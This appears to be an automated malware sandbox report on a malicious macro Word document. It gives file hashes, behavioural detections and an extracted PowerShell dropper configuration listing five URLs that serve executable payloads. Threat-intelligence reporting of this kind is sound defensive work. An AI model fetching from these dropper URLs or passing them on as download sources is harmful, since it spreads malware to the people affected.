Overview

overview

10

Static

static

8

27148a2ca2...18.doc

windows7-x64

10

27148a2ca2...18.doc

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    27148a2ca26de06491a69e10019524bc_JaffaCakes118

  • Size

    85KB

  • Sample

    240508-2rfxyabg3x

  • MD5

    27148a2ca26de06491a69e10019524bc

  • SHA1

    0ea4f779bdb39bb9be951e44c97f1204b3655082

  • SHA256

    a175a71552d15dfe1539ea84b67fa8ebb2967350b59fa42e2fabe91a603797c8

  • SHA512

    fe4335e99475c172d6f21465eaee71f8ac242dfc05d288a6238d25fdf99db42cecebc095bd5ac96033d78efe092ddaa5a51212938a88560a6f11b269366e3d2d

  • SSDEEP

    1536:pptJlmrJpmxlRw99NBY+a6fcE9AlxXR7dHNB:Xte2dw99flczXXBTB

Score
10/10
macromacro_on_action

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://southerncalenergysavings.com/ba
exe.dropper

http://progea4d.pl/w
exe.dropper

http://aracfilo.ozgurdagci.com/5fOi9g
exe.dropper

http://test.timkirkhope.com/xFuC78
exe.dropper

http://odd.learnhacking.net/91Jer4V

Targets

    • Target

      27148a2ca26de06491a69e10019524bc_JaffaCakes118

    • Size

      85KB

    • MD5

      27148a2ca26de06491a69e10019524bc

    • SHA1

      0ea4f779bdb39bb9be951e44c97f1204b3655082

    • SHA256

      a175a71552d15dfe1539ea84b67fa8ebb2967350b59fa42e2fabe91a603797c8

    • SHA512

      fe4335e99475c172d6f21465eaee71f8ac242dfc05d288a6238d25fdf99db42cecebc095bd5ac96033d78efe092ddaa5a51212938a88560a6f11b269366e3d2d

    • SSDEEP

      1536:pptJlmrJpmxlRw99NBY+a6fcE9AlxXR7dHNB:Xte2dw99flczXXBTB

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks